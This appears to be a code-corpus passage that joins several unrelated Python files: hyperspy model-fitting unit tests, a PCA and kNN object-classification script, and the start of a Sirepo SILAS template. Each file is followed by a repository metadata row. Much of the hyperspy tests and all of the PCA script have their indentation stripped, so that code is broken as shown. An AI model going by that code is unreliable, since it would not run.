        g4.sigma.value = 1
        g4.sigma.bmin = 10

        p.coefficients.value = (1, 2, 3, 4)
        p.coefficients.bmin = 2
        p.coefficients.bmax = 3

        m.ensure_parameters_in_bounds()
        np.testing.assert_almost_equal(g1.A.value, 3.)
        np.testing.assert_almost_equal(g2.A.value, 1.)
        np.testing.assert_almost_equal(g3.A.value, -3.)
        np.testing.assert_almost_equal(g4.A.value, 300.)
        np.testing.assert_almost_equal(g1.centre.value, 300.)
        np.testing.assert_almost_equal(g2.centre.value, 1.)
        np.testing.assert_almost_equal(g3.centre.value, 15.)
        np.testing.assert_almost_equal(g4.centre.value, 0)
        np.testing.assert_almost_equal(g1.sigma.value, 15.)
        np.testing.assert_almost_equal(g2.sigma.value, 3.)
        np.testing.assert_almost_equal(g3.sigma.value, 0.)
        np.testing.assert_almost_equal(g4.sigma.value, 1)
        np.testing.assert_almost_equal(p.coefficients.value, (2, 2, 3, 3))
class TestModel2D:
    """Fit a 2D Gaussian model to a synthetic noiseless image."""

    def setUp(self):
        # Ground-truth component used to generate the image data.
        truth = hs.model.components2D.Gaussian2D(
            centre_x=-5.,
            centre_y=-5.,
            sigma_x=1.,
            sigma_y=2.)
        axis_values = np.arange(-10, 10, 0.01)
        X, Y = np.meshgrid(axis_values, axis_values)
        im = hs.signals.Signal2D(truth.function(X, Y))
        # Calibrate both axes to match the mesh used above.
        for axis_index in (0, 1):
            im.axes_manager[axis_index].scale = 0.01
            im.axes_manager[axis_index].offset = -10
        self.im = im

    def test_fitting(self):
        model = self.im.create_model()
        # Start from deliberately offset initial values.
        gt = hs.model.components2D.Gaussian2D(centre_x=-4.5,
                                              centre_y=-4.5,
                                              sigma_x=0.5,
                                              sigma_y=1.5)
        model.append(gt)
        model.fit()
        # The fit must recover the generating parameters.
        np.testing.assert_almost_equal(gt.centre_x.value, -5.)
        np.testing.assert_almost_equal(gt.centre_y.value, -5.)
        np.testing.assert_almost_equal(gt.sigma_x.value, 1.)
        np.testing.assert_almost_equal(gt.sigma_y.value, 2.)
class TestModelFitBinned:
    """Regression tests pinning fit results of every supported optimizer
    on a fixed-seed Gaussian histogram."""

    def setUp(self):
        np.random.seed(1)  # fixed seed: the expected values below depend on it
        s = hs.signals.Signal1D(
            np.random.normal(
                scale=2,
                size=10000)).get_histogram()
        s.metadata.Signal.binned = True
        g = hs.model.components1D.Gaussian()
        m = s.create_model()
        m.append(g)
        # Deliberately offset starting values.
        g.sigma.value = 1
        g.centre.value = 0.5
        g.A.value = 1e3
        self.m = m

    def test_fit_neldermead_leastsq(self):
        self.m.fit(fitter="Nelder-Mead", method="ls")
        np.testing.assert_almost_equal(self.m[0].A.value, 9976.14519369)
        np.testing.assert_almost_equal(self.m[0].centre.value, -0.110610743285)
        np.testing.assert_almost_equal(self.m[0].sigma.value, 1.98380705455)

    def test_fit_neldermead_ml(self):
        self.m.fit(fitter="Nelder-Mead", method="ml")
        np.testing.assert_almost_equal(self.m[0].A.value, 10001.39613936,
                                       decimal=3)
        np.testing.assert_almost_equal(self.m[0].centre.value, -0.104151206314,
                                       decimal=6)
        np.testing.assert_almost_equal(self.m[0].sigma.value, 2.00053642434)

    def test_fit_leastsq(self):
        self.m.fit(fitter="leastsq")
        np.testing.assert_almost_equal(self.m[0].A.value, 9976.14526082, 1)
        np.testing.assert_almost_equal(self.m[0].centre.value, -0.110610727064)
        np.testing.assert_almost_equal(self.m[0].sigma.value, 1.98380707571, 5)

    def test_fit_mpfit(self):
        self.m.fit(fitter="mpfit")
        np.testing.assert_almost_equal(self.m[0].A.value, 9976.14526286, 5)
        np.testing.assert_almost_equal(self.m[0].centre.value, -0.110610718444)
        np.testing.assert_almost_equal(self.m[0].sigma.value, 1.98380707614)

    def test_fit_odr(self):
        self.m.fit(fitter="odr")
        np.testing.assert_almost_equal(self.m[0].A.value, 9976.14531979, 3)
        np.testing.assert_almost_equal(self.m[0].centre.value, -0.110610724054)
        np.testing.assert_almost_equal(self.m[0].sigma.value, 1.98380709939)

    def test_fit_leastsq_grad(self):
        # grad=True: analytical gradients should reproduce the same optimum.
        self.m.fit(fitter="leastsq", grad=True)
        np.testing.assert_almost_equal(self.m[0].A.value, 9976.14526084)
        np.testing.assert_almost_equal(self.m[0].centre.value, -0.11061073306)
        np.testing.assert_almost_equal(self.m[0].sigma.value, 1.98380707552)

    def test_fit_mpfit_grad(self):
        self.m.fit(fitter="mpfit", grad=True)
        np.testing.assert_almost_equal(self.m[0].A.value, 9976.14526084)
        np.testing.assert_almost_equal(self.m[0].centre.value, -0.11061073306)
        np.testing.assert_almost_equal(self.m[0].sigma.value, 1.98380707552)

    def test_fit_odr_grad(self):
        self.m.fit(fitter="odr", grad=True)
        np.testing.assert_almost_equal(self.m[0].A.value, 9976.14531979, 3)
        np.testing.assert_almost_equal(self.m[0].centre.value, -0.110610724054)
        np.testing.assert_almost_equal(self.m[0].sigma.value, 1.98380709939)

    def test_fit_bounded_mpfit(self):
        # Bound bmin above the unconstrained optimum: the fit must stick to it.
        self.m[0].centre.bmin = 0.5
        # self.m[0].bounded = True
        self.m.fit(fitter="mpfit", bounded=True)
        np.testing.assert_almost_equal(self.m[0].A.value, 9991.65422046, 4)
        np.testing.assert_almost_equal(self.m[0].centre.value, 0.5)
        np.testing.assert_almost_equal(self.m[0].sigma.value, 2.08398236966)

    def test_fit_bounded_leastsq(self):
        if StrictVersion(scipy.__version__) < StrictVersion("0.17"):
            raise SkipTest("least bounds only available in scipy >= 0.17")
        self.m[0].centre.bmin = 0.5
        # self.m[0].bounded = True
        self.m.fit(fitter="leastsq", bounded=True)
        np.testing.assert_almost_equal(self.m[0].A.value, 9991.65422046, 3)
        np.testing.assert_almost_equal(self.m[0].centre.value, 0.5)
        np.testing.assert_almost_equal(self.m[0].sigma.value, 2.08398236966)

    def test_fit_bounded_lbfgs(self):
        self.m[0].centre.bmin = 0.5
        # self.m[0].bounded = True
        self.m.fit(fitter="L-BFGS-B", bounded=True, grad=True)
        np.testing.assert_almost_equal(self.m[0].A.value, 9991.65422046, 4)
        np.testing.assert_almost_equal(self.m[0].centre.value, 0.5)
        np.testing.assert_almost_equal(self.m[0].sigma.value, 2.08398236966)

    def test_fit_bounded_bad_starting_values_mpfit(self):
        # Starting value outside the bound: the fitter must recover.
        self.m[0].centre.bmin = 0.5
        self.m[0].centre.value = -1
        # self.m[0].bounded = True
        self.m.fit(fitter="mpfit", bounded=True)
        np.testing.assert_almost_equal(self.m[0].A.value, 9991.65422046, 4)
        np.testing.assert_almost_equal(self.m[0].centre.value, 0.5)
        np.testing.assert_almost_equal(self.m[0].sigma.value, 2.08398236966)

    def test_fit_bounded_bad_starting_values_leastsq(self):
        self.m[0].centre.bmin = 0.5
        self.m[0].centre.value = -1
        # self.m[0].bounded = True
        self.m.fit(fitter="leastsq", bounded=True)
        np.testing.assert_almost_equal(self.m[0].A.value, 9991.65422046, 3)
        np.testing.assert_almost_equal(self.m[0].centre.value, 0.5)
        np.testing.assert_almost_equal(self.m[0].sigma.value, 2.08398236966)

    def test_fit_bounded_bad_starting_values_lbfgs(self):
        self.m[0].centre.bmin = 0.5
        self.m[0].centre.value = -1
        # self.m[0].bounded = True
        self.m.fit(fitter="L-BFGS-B", bounded=True, grad=True)
        np.testing.assert_almost_equal(self.m[0].A.value, 9991.65422046, 4)
        np.testing.assert_almost_equal(self.m[0].centre.value, 0.5)
        np.testing.assert_almost_equal(self.m[0].sigma.value, 2.08398236966)

    @nt.raises(ValueError)
    def test_wrong_method(self):
        self.m.fit(method="dummy")
class TestModelWeighted:
    """Weighted (variance-aware) fitting of a linear polynomial, binned
    and unbinned, across all fitters; plus chi-squared bookkeeping."""

    def setUp(self):
        np.random.seed(1)  # expected values below depend on this seed
        s = hs.signals.Signal1D(np.arange(10, 100, 0.1))
        # Per-channel variance drives the fit weights.
        s.metadata.set_item("Signal.Noise_properties.variance",
                            hs.signals.Signal1D(np.arange(10, 100, 0.01)))
        s.axes_manager[0].scale = 0.1
        s.axes_manager[0].offset = 10
        s.add_poissonian_noise()
        m = s.create_model()
        m.append(hs.model.components1D.Polynomial(1))
        self.m = m

    def test_fit_leastsq_binned(self):
        self.m.signal.metadata.Signal.binned = True
        self.m.fit(fitter="leastsq", method="ls")
        for result, expected in zip(self.m[0].coefficients.value,
                                    (9.9165596693502778, 1.6628238107916631)):
            np.testing.assert_almost_equal(result, expected, decimal=5)

    def test_fit_odr_binned(self):
        self.m.signal.metadata.Signal.binned = True
        self.m.fit(fitter="odr", method="ls")
        for result, expected in zip(self.m[0].coefficients.value,
                                    (9.9165596548961972, 1.6628247412317521)):
            np.testing.assert_almost_equal(result, expected, decimal=5)

    def test_fit_mpfit_binned(self):
        self.m.signal.metadata.Signal.binned = True
        self.m.fit(fitter="mpfit", method="ls")
        for result, expected in zip(self.m[0].coefficients.value,
                                    (9.9165596607108739, 1.6628243846485873)):
            np.testing.assert_almost_equal(result, expected, decimal=5)

    def test_fit_neldermead_binned(self):
        self.m.signal.metadata.Signal.binned = True
        self.m.fit(
            fitter="Nelder-Mead",
            method="ls",
        )
        for result, expected in zip(self.m[0].coefficients.value,
                                    (9.9137288425667442, 1.8446013472266145)):
            np.testing.assert_almost_equal(result, expected, decimal=5)

    def test_fit_leastsq_unbinned(self):
        # Unbinned results are the binned ones divided by the 0.1 axis scale.
        self.m.signal.metadata.Signal.binned = False
        self.m.fit(fitter="leastsq", method="ls")
        for result, expected in zip(
                self.m[0].coefficients.value,
                (0.99165596391487121, 0.16628254242532492)):
            np.testing.assert_almost_equal(result, expected, decimal=5)

    def test_fit_odr_unbinned(self):
        self.m.signal.metadata.Signal.binned = False
        self.m.fit(fitter="odr", method="ls")
        for result, expected in zip(
                self.m[0].coefficients.value,
                (0.99165596548961943, 0.16628247412317315)):
            np.testing.assert_almost_equal(result, expected, decimal=5)

    def test_fit_mpfit_unbinned(self):
        self.m.signal.metadata.Signal.binned = False
        self.m.fit(fitter="mpfit", method="ls")
        for result, expected in zip(
                self.m[0].coefficients.value,
                (0.99165596295068958, 0.16628257462820528)):
            np.testing.assert_almost_equal(result, expected, decimal=5)

    def test_fit_neldermead_unbinned(self):
        self.m.signal.metadata.Signal.binned = False
        self.m.fit(
            fitter="Nelder-Mead",
            method="ls",
        )
        for result, expected in zip(
                self.m[0].coefficients.value,
                (0.99136169230026261, 0.18483060534056939)):
            np.testing.assert_almost_equal(result, expected, decimal=5)

    def test_chisq(self):
        self.m.signal.metadata.Signal.binned = True
        self.m.fit(fitter="leastsq", method="ls")
        np.testing.assert_almost_equal(self.m.chisq.data, 3029.16949561)

    def test_red_chisq(self):
        self.m.fit(fitter="leastsq", method="ls")
        np.testing.assert_almost_equal(self.m.red_chisq.data, 3.37700055)
class TestModelScalarVariance:
    """Chi-squared statistics with a scalar noise variance.

    The (reduced) chi-squared must be independent of the noise scale when
    the variance metadata matches the injected noise.
    """

    def setUp(self):
        signal = hs.signals.Signal1D(np.ones(100))
        model = signal.create_model()
        model.append(hs.model.components1D.Offset())
        self.s = signal
        self.m = model

    def _fit_with_noise(self, std):
        """Inject seeded Gaussian noise of the given std, record its
        variance in the metadata and run a least-squares fit."""
        np.random.seed(1)
        self.s.add_gaussian_noise(std)
        self.s.metadata.set_item("Signal.Noise_properties.variance", std ** 2)
        self.m.fit(fitter="leastsq", method="ls")

    def test_std1_chisq(self):
        self._fit_with_noise(1)
        np.testing.assert_almost_equal(self.m.chisq.data, 78.35015229)

    def test_std10_chisq(self):
        self._fit_with_noise(10)
        np.testing.assert_almost_equal(self.m.chisq.data, 78.35015229)

    def test_std1_red_chisq(self):
        self._fit_with_noise(1)
        np.testing.assert_almost_equal(self.m.red_chisq.data, 0.79949135)

    def test_std10_red_chisq(self):
        self._fit_with_noise(10)
        np.testing.assert_almost_equal(self.m.red_chisq.data, 0.79949135)

    def test_std1_red_chisq_in_range(self):
        # Restricting the signal range changes the degrees of freedom.
        self.m.set_signal_range(10, 50)
        self._fit_with_noise(1)
        np.testing.assert_almost_equal(self.m.red_chisq.data, 0.86206965)
class TestModelSignalVariance:
# Fixture: 2-pixel signal with per-pixel variance metadata (gaussian +
# poissonian noise). Reduced chi-squared after multifit should come out
# near 1 for both pixels when the variance model is correct.
def setUp(self):
variance = hs.signals.Signal1D(np.arange(100, 300).reshape(
(2, 100)))
s = variance.deepcopy()
np.random.seed(1)
std = 10
s.add_gaussian_noise(std)
s.add_poissonian_noise()
s.metadata.set_item("Signal.Noise_properties.variance",
variance + std ** 2)
m = s.create_model()
m.append(hs.model.components1D.Polynomial(order=1))
self.s = s
self.m = m
def test_std1_red_chisq(self):
self.m.multifit(fitter="leastsq", method="ls", show_progressbar=None)
np.testing.assert_almost_equal(self.m.red_chisq.data[0],
0.79693355673230915)
np.testing.assert_almost_equal(self.m.red_chisq.data[1],
0.91453032901427167)
class TestMultifit:
# Fixture: 2-pixel power-law signal whose exact parameters are A=2, r=3.
# setUp stores deliberately wrong values in the parameter maps (r=100 at
# index 1, starting A=100 at index 0) and fixes A, so the multifit tests
# can distinguish fetching stored values from refitting.
def setUp(self):
s = hs.signals.Signal1D(np.zeros((2, 200)))
s.axes_manager[-1].offset = 1
s.data[:] = 2 * s.axes_manager[-1].axis ** (-3)
m = s.create_model()
m.append(hs.model.components1D.PowerLaw())
m[0].A.value = 2
m[0].r.value = 2
m.store_current_values()
m.axes_manager.indices = (1,)
m[0].r.value = 100
m[0].A.value = 2
m.store_current_values()
m[0].A.free = False
self.m = m
m.axes_manager.indices = (0,)
m[0].A.value = 100
def test_fetch_only_fixed_false(self):
# fetching all stored values: the bad stored r=100 at index 1 is kept
self.m.multifit(fetch_only_fixed=False, show_progressbar=None)
np.testing.assert_array_almost_equal(self.m[0].r.map['values'],
[3., 100.])
np.testing.assert_array_almost_equal(self.m[0].A.map['values'],
[2., 2.])
def test_fetch_only_fixed_true(self):
# fetching only fixed parameters: r is refitted to 3 at both indices
self.m.multifit(fetch_only_fixed=True, show_progressbar=None)
np.testing.assert_array_almost_equal(self.m[0].r.map['values'],
[3., 3.])
np.testing.assert_array_almost_equal(self.m[0].A.map['values'],
[2., 2.])
def test_parameter_as_signal_values(self):
# There are more as_signal tests in test_parameters.py
rs = self.m[0].r.as_signal(field="values")
np.testing.assert_almost_equal(rs.data, np.array([2., 100.]))
nt.assert_false("Signal.Noise_properties.variance" in rs.metadata)
self.m.multifit(fetch_only_fixed=True, show_progressbar=None)
rs = self.m[0].r.as_signal(field="values")
nt.assert_true("Signal.Noise_properties.variance" in rs.metadata)
nt.assert_is_instance(rs.metadata.Signal.Noise_properties.variance,
hs.signals.Signal1D)
def test_bounded_snapping_mpfit(self):
# start A below its bmin; bounded mpfit must still converge to A=4
# (the data was doubled, so the optimum is twice the original A=2)
m = self.m
m[0].A.free = True
m.signal.data *= 2.
m[0].A.value = 2.
m[0].A.bmin = 3.
m.multifit(fitter='mpfit', bounded=True, show_progressbar=None)
np.testing.assert_array_almost_equal(self.m[0].r.map['values'],
[3., 3.])
np.testing.assert_array_almost_equal(self.m[0].A.map['values'],
[4., 4.])
def test_bounded_snapping_leastsq(self):
# same scenario as above with the leastsq fitter
m = self.m
m[0].A.free = True
m.signal.data *= 2.
m[0].A.value = 2.
m[0].A.bmin = 3.
m.multifit(fitter='leastsq', bounded=True, show_progressbar=None)
np.testing.assert_array_almost_equal(self.m[0].r.map['values'],
[3., 3.])
np.testing.assert_array_almost_equal(self.m[0].A.map['values'],
[4., 4.])
class TestStoreCurrentValues:
# store_current_values should persist parameter values into the
# parameter map only for active components.
def setUp(self):
self.m = hs.signals.Signal1D(np.arange(10)).create_model()
self.o = hs.model.components1D.Offset()
self.m.append(self.o)
def test_active(self):
self.o.offset.value = 2
self.o.offset.std = 3
self.m.store_current_values()
nt.assert_equal(self.o.offset.map["values"][0], 2)
nt.assert_equal(self.o.offset.map["is_set"][0], True)
def test_not_active(self):
# inactive components must not have their values stored
self.o.active = False
self.o.offset.value = 2
self.o.offset.std = 3
self.m.store_current_values()
nt.assert_not_equal(self.o.offset.map["values"][0], 2)
class TestSetCurrentValuesTo:
# assign_current_values_to_all broadcasts the current parameter values
# to every navigation index, optionally for a subset of components.
def setUp(self):
self.m = hs.signals.Signal1D(
np.arange(10).reshape(2, 5)).create_model()
self.comps = [
hs.model.components1D.Offset(),
hs.model.components1D.Offset()]
self.m.extend(self.comps)
def test_set_all(self):
for c in self.comps:
c.offset.value = 2
self.m.assign_current_values_to_all()
nt.assert_true((self.comps[0].offset.map["values"] == 2).all())
nt.assert_true((self.comps[1].offset.map["values"] == 2).all())
def test_set_1(self):
# only the listed component is broadcast; the other stays untouched
self.comps[1].offset.value = 2
self.m.assign_current_values_to_all([self.comps[1]])
nt.assert_true((self.comps[0].offset.map["values"] != 2).all())
nt.assert_true((self.comps[1].offset.map["values"] == 2).all())
class TestAsSignal:
# as_signal renders the model (or a subset of its components) back into
# a signal. Two Offset components of value 2 each give data == 4 when
# both are included and == 2 for a single component.
def setUp(self):
self.m = hs.signals.Signal1D(
np.arange(10).reshape(2, 5)).create_model()
self.comps = [
hs.model.components1D.Offset(),
hs.model.components1D.Offset()]
self.m.extend(self.comps)
for c in self.comps:
c.offset.value = 2
self.m.assign_current_values_to_all()
def test_all_components_simple(self):
s = self.m.as_signal(show_progressbar=None)
nt.assert_true(np.all(s.data == 4.))
def test_one_component_simple(self):
# selecting component 0 must not deactivate component 1
s = self.m.as_signal(component_list=[0], show_progressbar=None)
nt.assert_true(np.all(s.data == 2.))
nt.assert_true(self.m[1].active)
def test_all_components_multidim(self):
# with active_is_multidimensional, deactivating component 0 at
# index 0 only removes its contribution at that pixel
self.m[0].active_is_multidimensional = True
s = self.m.as_signal(show_progressbar=None)
nt.assert_true(np.all(s.data == 4.))
self.m[0]._active_array[0] = False
s = self.m.as_signal(show_progressbar=None)
np.testing.assert_array_equal(
s.data, np.array([np.ones(5) * 2, np.ones(5) * 4]))
nt.assert_true(self.m[0].active_is_multidimensional)
def test_one_component_multidim(self):
# rendering must not disturb the multidimensional-active flags
self.m[0].active_is_multidimensional = True
s = self.m.as_signal(component_list=[0], show_progressbar=None)
nt.assert_true(np.all(s.data == 2.))
nt.assert_true(self.m[1].active)
nt.assert_false(self.m[1].active_is_multidimensional)
s = self.m.as_signal(component_list=[1], show_progressbar=None)
np.testing.assert_equal(s.data, 2.)
nt.assert_true(self.m[0].active_is_multidimensional)
self.m[0]._active_array[0] = False
s = self.m.as_signal(component_list=[1], show_progressbar=None)
nt.assert_true(np.all(s.data == 2.))
s = self.m.as_signal(component_list=[0], show_progressbar=None)
np.testing.assert_array_equal(s.data,
np.array([np.zeros(5), np.ones(5) * 2]))
class TestCreateModel:
# create_model should dispatch on signal dimensionality:
# Signal1D -> Model1D, Signal2D -> Model2D.
def setUp(self):
self.s = hs.signals.Signal1D(np.asarray([0, ]))
self.im = hs.signals.Signal2D(np.ones([1, 1, ]))
def test_create_model(self):
from hyperspy.models.model1d import Model1D
from hyperspy.models.model2d import Model2D
nt.assert_is_instance(
self.s.create_model(), Model1D)
nt.assert_is_instance(
self.im.create_model(), Model2D)
class TestAdjustPosition:
# enable_adjust_position attaches interactive position widgets (a pair:
# line + label) for each positionable component; these tests track the
# widget bookkeeping in m._position_widgets.
def setUp(self):
self.s = hs.signals.Signal1D(np.random.rand(10, 10, 20))
self.m = self.s.create_model()
def test_enable_adjust_position(self):
self.m.append(hs.model.components1D.Gaussian())
self.m.enable_adjust_position()
nt.assert_equal(len(self.m._position_widgets), 1)
# Check that both line and label was added
nt.assert_equal(len(list(self.m._position_widgets.values())[0]), 2)
def test_disable_adjust_position(self):
self.m.append(hs.model.components1D.Gaussian())
self.m.enable_adjust_position()
self.m.disable_adjust_position()
nt.assert_equal(len(self.m._position_widgets), 0)
def test_enable_all(self):
# components appended after enabling also get widgets
self.m.append(hs.model.components1D.Gaussian())
self.m.enable_adjust_position()
self.m.append(hs.model.components1D.Gaussian())
nt.assert_equal(len(self.m._position_widgets), 2)
def test_enable_all_zero_start(self):
self.m.enable_adjust_position()
self.m.append(hs.model.components1D.Gaussian())
nt.assert_equal(len(self.m._position_widgets), 1)
def test_manual_close(self):
# closing one widget of a pair leaves its partner; closing the last
# widget of a component drops that component's entry entirely
self.m.append(hs.model.components1D.Gaussian())
self.m.append(hs.model.components1D.Gaussian())
self.m.enable_adjust_position()
list(self.m._position_widgets.values())[0][0].close()
nt.assert_equal(len(self.m._position_widgets), 2)
nt.assert_equal(len(list(self.m._position_widgets.values())[0]), 1)
list(self.m._position_widgets.values())[0][0].close()
nt.assert_equal(len(self.m._position_widgets), 1)
nt.assert_equal(len(list(self.m._position_widgets.values())[0]), 2)
self.m.disable_adjust_position()
nt.assert_equal(len(self.m._position_widgets), 0)
| vidartf/hyperspy | hyperspy/tests/model/test_model.py | Python | gpl-3.0 | 41,020 | [
"Gaussian"
] | bd043695b02915ad46e48f95c308290b76549e42a62a088df11f9188e236b0cd |
# Principal Component Analysis Code :
from numpy import mean,cov,double,cumsum,dot,linalg,array,rank,size,flipud
from pylab import *
import numpy as np
import matplotlib.pyplot as pp
#from enthought.mayavi import mlab
import scipy.ndimage as ni
import roslib; roslib.load_manifest('sandbox_tapo_darpa_m3')
import rospy
#import hrl_lib.mayavi2_util as mu
import hrl_lib.viz as hv
import hrl_lib.util as ut
import hrl_lib.matplotlib_util as mpu
import pickle
from mvpa.clfs.knn import kNN
from mvpa.datasets import Dataset
from mvpa.clfs.transerror import TransferError
from mvpa.misc.data_generators import normalFeatureDataset
from mvpa.algorithms.cvtranserror import CrossValidatedTransferError
from mvpa.datasets.splitters import NFoldSplitter
import sys
sys.path.insert(0, '/home/tapo/svn/robot1_data/usr/tapo/data_code/Classification/Data/Single_Contact_kNN/Scaled')
from data_method_V import Fmat_original
def pca(X):
# Principal component analysis via the covariance method (Python 2 code).
# X is the (features x samples) data matrix; returns the eigenvectors,
# eigenvalues, per-row mean, centered data M and covariance matrix Mcov.
# NOTE(review): X - mean_X relies on np.matrix-style column broadcasting
# (mean_X must be a column); verify Fmat_original is an np.matrix.
#get dimensions
num_data,dim = X.shape
#center data
mean_X = X.mean(axis=1)
M = (X-mean_X) # subtract the mean (along columns)
Mcov = cov(M)
###### Sanity Check ######
# NaN scan: x != x is only true for NaN. The 82x140 bounds are
# hard-coded for this dataset -- TODO generalize to X.shape.
i=0
n=0
while i < 82:
j=0
while j < 140:
if X[i,j] != X[i,j]:
print X[i,j]
print i,j
n=n+1
j = j+1
i=i+1
print n
##########################
print 'PCA - COV-Method used'
val,vec = linalg.eig(Mcov)
#return the projection matrix, the variance and the mean
return vec,val,mean_X, M, Mcov
if __name__ == '__main__':
# Pipeline: select two object groups from the raw feature matrix, run
# PCA, project onto the first 20 PCs, then cross-validate a 1-NN
# classifier on the projected data with PyMVPA.
Fmat = np.row_stack([Fmat_original[0:41,:], Fmat_original[82:123,:]])
# Checking the Data-Matrix
m_tot, n_tot = np.shape(Fmat)
print 'Total_Matrix_Shape:',m_tot,n_tot
eigvec_total, eigval_total, mean_data_total, B, C = pca(Fmat)
#print eigvec_total
#print eigval_total
#print mean_data_total
m_eigval_total, n_eigval_total = np.shape(np.matrix(eigval_total))
m_eigvec_total, n_eigvec_total = np.shape(eigvec_total)
m_mean_data_total, n_mean_data_total = np.shape(np.matrix(mean_data_total))
print 'Eigenvalue Shape:',m_eigval_total, n_eigval_total
print 'Eigenvector Shape:',m_eigvec_total, n_eigvec_total
print 'Mean-Data Shape:',m_mean_data_total, n_mean_data_total
#Recall that the cumulative sum of the eigenvalues shows the level of variance accounted by each of the corresponding eigenvectors. On the x axis there is the number of eigenvalues used.
perc_total = cumsum(eigval_total)/sum(eigval_total)
# Reduced Eigen-Vector Matrix according to highest Eigenvalues..(Considering First 20 based on above figure)
W = eigvec_total[:,0:20]
m_W, n_W = np.shape(W)
print 'Reduced Dimension Eigenvector Shape:',m_W, n_W
# Normalizes the data set with respect to its variance (Not an Integral part of PCA, but useful)
length = len(eigval_total)
s = np.matrix(np.zeros(length)).T
i = 0
while i < length:
s[i] = sqrt(C[i,i])
i = i+1
Z = np.divide(B,s)
m_Z, n_Z = np.shape(Z)
print 'Z-Score Shape:', m_Z, n_Z
#Projected Data:
Y = (W.T)*B # 'B' for my Laptop: otherwise 'Z' instead of 'B'
m_Y, n_Y = np.shape(Y.T)
print 'Transposed Projected Data Shape:', m_Y, n_Y
#Using PYMVPA
# 28 object classes x 5 trials each = 140 labeled samples
PCA_data = np.array(Y.T)
PCA_label_2 = ['Styrofoam-Fixed']*5 + ['Books-Fixed']*5 + ['Bucket-Fixed']*5 + ['Bowl-Fixed']*5 + ['Can-Fixed']*5 + ['Box-Fixed']*5 + ['Pipe-Fixed']*5 + ['Styrofoam-Movable']*5 + ['Container-Movable']*5 + ['Books-Movable']*5 + ['Cloth-Roll-Movable']*5 + ['Black-Rubber-Movable']*5 + ['Can-Movable']*5 + ['Box-Movable']*5 + ['Rug-Fixed']*5 + ['Bubble-Wrap-1-Fixed']*5 + ['Pillow-1-Fixed']*5 + ['Bubble-Wrap-2-Fixed']*5 + ['Sponge-Fixed']*5 + ['Foliage-Fixed']*5 + ['Pillow-2-Fixed']*5 + ['Rug-Movable']*5 + ['Bubble-Wrap-1-Movable']*5 + ['Pillow-1-Movable']*5 + ['Bubble-Wrap-2-Movable']*5 + ['Pillow-2-Movable']*5 + ['Plush-Toy-Movable']*5 + ['Sponge-Movable']*5
clf = kNN(k=1)
terr = TransferError(clf)
ds1 = Dataset(samples=PCA_data,labels=PCA_label_2)
print ds1.samples.shape
# leave-one-out cross-validation with a confusion matrix
cvterr = CrossValidatedTransferError(terr,NFoldSplitter(cvtype=1),enable_states=['confusion'])
error = cvterr(ds1)
print error
print cvterr.confusion.asstring(description=False)
figure(1)
cvterr.confusion.plot(numbers='True',numbers_alpha=2)
#show()
# Variances
figure(2)
title('Variances of PCs')
stem(range(len(perc_total)),perc_total,'--b')
axis([-0.3,130.3,0,1.2])
grid('True')
show()
| tapomayukh/projects_in_python | classification/Classification_with_kNN/Single_Contact_Classification/Feature_Comparison/multiple_features/results/test10_cross_validate_objects_1200ms_scaled_method_v_force_motion.py | Python | mit | 4,600 | [
"Mayavi"
] | a9c398d1595ca9a5e30ad94fd707717794b8368064154a63da5c08d696c644b8 |
# -*- coding: utf-8 -*-
u"""SILAS execution template.
:copyright: Copyright (c) 2020 RadiaSoft LLC. All Rights Reserved.
:license: http://www.apache.org/licenses/LICENSE-2.0.html
"""
from __future__ import absolute_import, division, print_function
from pykern import pkio
from pykern import pkjson
from pykern.pkcollections import PKDict
from pykern.pkdebug import pkdp, pkdc, pkdlog
from scipy import constants
from sirepo import simulation_db
from sirepo.template import template_common
import csv
import h5py
import math
import numpy as np
import re
import sirepo.sim_data
_SIM_DATA, SIM_TYPE, _SCHEMA = sirepo.sim_data.template_globals()
_CRYSTAL_CSV_FILE = 'crystal.csv'
_SUMMARY_CSV_FILE = 'wavefront.csv'
_INITIAL_LASER_FILE = 'initial-laser.npy'
_FINAL_LASER_FILE = 'final-laser.npy'
def background_percent_complete(report, run_dir, is_running):
# Report progress for either the RT run ('animation') or the crystal
# heat run ('crystalAnimation') by inspecting the CSV output files.
data = simulation_db.read_json(run_dir.join(template_common.INPUT_BASE_NAME))
res = PKDict(
percentComplete=0,
frameCount=0,
)
if report == 'animation':
# last line of wavefront.csv begins with the latest frame counter
line = template_common.read_last_csv_line(run_dir.join(_SUMMARY_CSV_FILE))
m = re.search(r'^(\d+)', line)
if m and int(m.group(1)) > 0:
# the csv holds intermediate rows, so two rows make one frame
res.frameCount = int((int(m.group(1)) + 1) / 2)
res.wavefrontsFrameCount = _counts_for_beamline(res.frameCount, data.models.beamline)[0]
total_count = _total_frame_count(data)
res.percentComplete = res.frameCount * 100 / total_count
return res
assert report == 'crystalAnimation'
count = 0
path = run_dir.join(_CRYSTAL_CSV_FILE)
if path.exists():
with pkio.open_text(str(path)) as f:
for line in f:
count += 1
# first two lines are axis points
if count > 2:
# two csv rows (x and z profiles) per plotted time step
plot_count = int((count - 2) / 2)
res.frameCount = plot_count
res.percentComplete = plot_count * 100 / (1 + data.models.crystalSettings.steps / data.models.crystalSettings.plotInterval)
return res
def post_execution_processing(success_exit=True, run_dir=None, **kwargs):
    """Return None for a clean exit, otherwise the parsed run-log errors."""
    if not success_exit:
        return _parse_silas_log(run_dir)
    return None
def get_data_file(run_dir, model, frame, options=None, **kwargs):
# Map a report model name to its downloadable data file.
# NOTE(review): the first pulse report is matched here as
# 'laserPulseAnimation' while the frame handlers below are named
# 'laserPulse1Animation' -- confirm which name the client sends.
if model in ('laserPulseAnimation', 'laserPulse2Animation'):
return _INITIAL_LASER_FILE
if model in ('laserPulse3Animation', 'laserPulse4Animation'):
return _FINAL_LASER_FILE
if model == 'wavefrontSummaryAnimation':
return _SUMMARY_CSV_FILE
if 'wavefrontAnimation' in model:
# per-element wavefront: resolve the element id to an h5 dump
sim_in = simulation_db.read_json(run_dir.join(template_common.INPUT_BASE_NAME))
return _wavefront_filename_for_index(
sim_in,
sim_in.models[model].id,
frame,
)
if 'plotAnimation' in model:
return _CRYSTAL_CSV_FILE
if model == 'crystal3dAnimation':
return 'intensity.npy'
raise AssertionError('unknown model={}'.format(model))
def python_source_for_model(data, model):
    """Return generated python source for *model*'s report type."""
    # crystal reports run the heat-simulation template; everything else
    # runs the RT template
    crystal_reports = ('crystal3dAnimation', 'plotAnimation', 'plot2Animation')
    data.report = 'crystalAnimation' if model in crystal_reports else 'animation'
    return _generate_parameters_file(data)
def sim_frame(frame_args):
# Default frame handler: load the saved wavefront dump for this beamline
# element/frame and return a 2d intensity heatmap report.
filename = _wavefront_filename_for_index(
frame_args.sim_in,
